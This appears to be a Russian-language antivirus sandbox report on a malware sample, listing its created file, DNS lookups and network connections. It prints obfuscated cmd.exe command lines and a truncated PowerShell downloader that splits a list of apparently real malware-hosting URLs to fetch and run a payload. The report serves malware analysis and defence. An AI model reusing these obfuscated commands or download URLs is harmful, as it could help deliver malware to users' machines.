Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c c^M^d;;/v^ ; /C";( ( (^Set ^ET^9=NW ^aB^ X ^54^ i^A^ fE ^wW Vh^ CU tz 4D Hj ^3d ^4^x vV cj ^Of y^J}Vc} ^G{Umh Mc^DNtV8^a1tc12^}UWk8TaS^jeABrVh^b^Pz; D^Eis^z4^WFoy$fw N^T^sbvsC^jeMJcmW^o^K...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\wem.exe
Сетевая активность
Подключается к
- 'ca#####-von-hainrich.de':80
UDP
- DNS ASK tr####ampung.com
- DNS ASK ho####ndoulas.com
- DNS ASK cl####anatur.com.br
- DNS ASK ma##ha.ru
- DNS ASK ca#####-von-hainrich.de
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c c^M^d;;/v^ ; /C";( ( (^Set ^ET^9=NW ^aB^ X ^54^ i^A^ fE ^wW Vh^ CU tz 4D Hj ^3d ^4^x vV cj ^Of y^J}Vc} ^G{Umh Mc^DNtV8^a1tc12^}UWk8TaS^jeABrVh^b^Pz; D^Eis^z4^WFoy$fw N^T^sbvsC^jeMJcmW^o^K...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' ;;/v ; /C";( ( (^Set ^ET^9=NW ^aB^ X ^54^ i^A^ fE ^wW Vh^ CU tz 4D Hj ^3d ^4^x vV cj ^Of y^J}Vc} ^G{Umh Mc^DNtV8^a1tc12^}UWk8TaS^jeABrVh^b^Pz; D^Eis^z4^WFoy$fw N^T^sbvsC^jeMJcmW^o^KirHqP^ZS-...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $ZEb='uAv';$AkP='http://tr####ampung.com/xkIJX5Lp@http://hobokendoulas.com/lmTIr@http://clinicanatur.com.br/rM@http://mausha.ru/4ncahc@http://candrac-von-hainrich.de/0Sk7c2za'.Split('@');$FzE=(...
